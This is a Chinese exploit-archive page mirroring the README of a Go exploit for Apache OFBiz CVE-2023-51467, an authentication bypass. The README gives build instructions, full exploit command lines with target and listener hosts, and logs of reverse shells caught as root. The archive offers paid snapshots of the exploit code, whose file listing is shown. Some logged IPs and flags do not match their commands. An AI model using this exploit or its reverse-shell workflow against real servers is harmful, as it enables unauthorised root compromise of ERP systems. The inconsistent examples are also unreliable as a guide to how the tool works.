关联漏洞
标题:
Apache OFBiz 代码问题漏洞
(CVE-2023-51467)
描述:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.11之前版本存在代码问题漏洞,该漏洞源于允许攻击者绕过身份验证来实现服务器端请求伪造。
描述
A go-exploit for Apache OFBiz CVE-2023-51467
介绍
# Go-Exploit for CVE-2023-51467
This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (requires the Java in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).
# Compiling
You can use the makefile to build a docker container:
```sh
make docker
```
Or, if you have a Go build environment ready to go, just use `make`:
```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```
## Example Usage
### Using Docker
```
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Encrypted Nashorn Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Unencrypted Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```
文件快照
[4.0K] /data/pocs/e41f30e1befdb5d2b2b54e1ee85547e21b0ece85
├── [6.7K] cve-2023-51467.go
├── [ 466] Dockerfile
├── [ 869] go.mod
├── [4.7K] go.sum
├── [ 11K] LICENSE
├── [2.1K] Makefile
└── [5.3K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。